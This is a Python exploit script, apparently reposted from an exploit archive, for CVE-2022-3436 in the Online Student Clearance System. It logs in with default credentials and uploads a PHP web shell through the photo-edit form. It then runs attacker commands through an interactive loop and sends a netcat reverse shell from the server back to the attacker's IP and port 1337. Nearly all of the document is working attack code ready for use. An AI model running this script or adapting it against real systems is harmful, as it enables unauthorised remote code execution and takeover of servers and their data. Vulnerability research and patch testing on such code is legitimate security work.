Share
## https://sploitus.com/exploit?id=PACKETSTORM:176007
#!/usr/bin/python3
# Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE (Authenticated)
# Date: 28/11/2023
# Exploit Author: Akash Pandey aka l3v1ath0n
# Version: <= 1.0
# Tested on: Kali Linux
# CVE : CVE-2022-3436
import requests
import time
import os
print("""
____ ___ ____ ____ _____ _ _ _____ __
_____ _____ |___ \ / _ \___ \|___ \ |___ /| || ||___ / / /_
/ __\ \ / / _ \_____ __) | | | |__) | __) |____ |_ \| || |_ |_ \| '_ \
| (__ \ V / __/_____/ __/| |_| / __/ / __/_____|__) |__ _|__) | (_) |
\___| \_/ \___| |_____|\___/_____|_____| |____/ |_||____/ \___/
Exploit: By Akash Pandey aka l3v1ath0n, developed with ❤️:
Twitter: https://twitter.com/_l3v1ath0n
Github: https://www.github.com/1337-L3V1ATH0N/Exploit_Development/
""")
web_url = "http://192.168.1.26/student/" # Edit this as per your need
username = "18/132010" # Default Username
password = "11111111" # Default Password
local_ip = "192.168.1.6" # Edit this IP to your local Ip for reverse shell
local_port = "1337" # Port of local machine to connect reverse shell on...
rev_shell = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + local_ip + " " + local_port + " >/tmp/f"
# Firing request to login
log_url = web_url+"login.php"
#Telling script to use previous session
session = requests.Session()
#Post Body Data for login
post_data = {'txtmatric_no':username,'txtpassword':password, 'btnlogin':''}
#Sending request to web server with required post data
response = session.post(log_url,data=post_data)
# Checking Login if Successful:
time.sleep(1)
# Creating a shell file in current directory
print("[i] Creating a shell file to upload.")
with open("shell.php","w") as file:
file.write("<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>")
file.close()
time.sleep(1)
print("[i] Checking Login.")
if response.history:
print("[+] Login Successful.")
time.sleep(1)
print("[i] Uploading Shell.")
# Step 1: Reads the shell.php file in current folder
# Step 2: Stores the content in filename called shell.php
# Step 3: Uses the variable name userImage to upload file to server.
file = {'userImage':('shell.php',open("shell.php","rb"))}
# Sending payload as POST data to shell.php file
payload = {'userImage':"<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>",'btnedit':''}
# Uploading the malicious php file at below path using files and data values
upload_response = session.post(web_url+"edit-photo.php",files=file,data=payload)
print ("[TIP] Run netcat to catch reverse-shell on nc. Edit IP and Port in script")
while True:
command = input("l3v1ath0n㉿CVE-2022-3436: ")
if command == "exit":
break
elif command == "netcat":
print("[!] Don't forget to start Netcat Listener")
time.sleep(3)
payload = {'cmd':rev_shell}
cmd = session.get(web_url+"uploads/shell.php?",params=payload)
print(cmd.text)
else:
payload = {'cmd':command}
cmd = session.get(web_url+"uploads/shell.php?",params=payload)
print(cmd.text)
print("\n[i] Closing this Session")
session.close()
else:
print("[-] Login Failed.")